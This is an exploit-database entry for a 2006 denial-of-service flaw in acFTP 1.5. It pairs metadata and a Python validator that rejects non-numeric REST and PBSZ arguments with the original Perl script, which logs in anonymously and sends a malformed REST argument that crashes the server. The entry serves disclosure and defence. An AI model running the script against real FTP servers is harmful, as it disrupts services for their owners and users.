Vendor: acFTP
By: gbr
CVSS: 7.5 HIGH
Type: Denial of Service
CWE: 400
Product Name: acFTP
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: YES
Related CWE: N/A
CPE: a:acftp:acftp:1.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

acFTP 1.5 (REST/PBSZ) Denial of Service

This exploit uses Perl's IO::Socket module to log in as anonymous and send a REST or PBSZ command with a malformed, non-numeric argument to the FTP server, causing it to crash.

Mitigation:

Upgrade to the latest version of acFTP 1.5 or later.
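
Where the server cannot be upgraded immediately, the malformed argument can be rejected or flagged before it reaches the parser. The following is an added example, not part of the original advisory or of acFTP: a control-channel check that accepts REST and PBSZ only with a decimal argument, as RFC 3659 (REST in stream mode) and RFC 2228 (PBSZ) define them. The function names, the 63-bit ceiling for REST and the sample session are assumptions made for the example.

```python
import re

# Commands covered by this check, with the largest argument accepted.
# PBSZ: RFC 2228 limits the value to an unsigned 32-bit integer.
# REST: RFC 3659 gives no ceiling; 2**63 - 1 is an assumption for this example.
NUMERIC_ARG_COMMANDS = {"REST": 2**63 - 1, "PBSZ": 2**32 - 1}


def check_ftp_command(line: bytes):
    """Return None if the line is acceptable, else a short reason string."""
    text = line.rstrip(b"\r\n").decode("latin-1")
    verb, _, arg = text.partition(" ")
    verb = verb.upper()
    limit = NUMERIC_ARG_COMMANDS.get(verb)
    if limit is None:
        return None  # not a command this check covers
    # Exactly one run of ASCII digits, bounded in length before int() is called.
    if not re.fullmatch(r"[0-9]{1,20}", arg):
        return f"{verb}: non-numeric argument {arg!r}"
    if int(arg) > limit:
        return f"{verb}: argument out of range"
    return None


def scan(lines):
    """Return (line_number, reason) for every rejected control-channel line."""
    return [(n, r) for n, l in enumerate(lines, 1) if (r := check_ftp_command(l))]


# Constructed sample session; lines 4 and 6 carry the argument pattern
# used by the script on this page, line 7 is an oversized PBSZ value.
SAMPLE = [
    b"USER anonymous\r\n",
    b"PASS anonymous\r\n",
    b"REST 1024\r\n",
    b"REST " + b"{}*{" * 10 + b"\r\n",
    b"PBSZ 0\r\n",
    b"PBSZ " + b"{}*{" * 10 + b"\r\n",
    b"PBSZ 4294967296\r\n",
]

if __name__ == "__main__":
    for n, reason in scan(SAMPLE):
        print(f"line {n}: {reason}")
```

The same check works as a filter in an FTP-aware proxy or as a pass over captured control-channel logs; REST markers in block or compressed mode are not decimal and would need a separate rule.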

Exploit-DB raw data:

#################################################
# acFTP 1.5 (REST/PBSZ) Denial of Service       #
# author: gbr                                   #
# mail: gabrielquadros[at]hotmail.com           #
#################################################


use IO::Socket;

if(!defined($ARGV[0])) {
       print "Usage: $0 ip port\n";
       exit;
}

my $sock = new IO::Socket::INET(PeerAddr => $ARGV[0],
                               PeerPort => $ARGV[1],
                               Proto    => 'tcp')
       or die "Could not open a socket: $!\n";

$sock->recv($buf, 1024);
$sock->send("USER anonymous\r\n");
$sock->recv($buf, 1024);
$sock->send("PASS anonymous\r\n");
$sock->recv($buf, 1024);
for($i=0; $i<10; $i++) {
       $data .= "{}*{";
}

$sock->send("REST $data\r\n");
# $sock->send("PBSZ $data\r\n");

print "Server exploited\n";

# milw0rm.com [2006-12-23]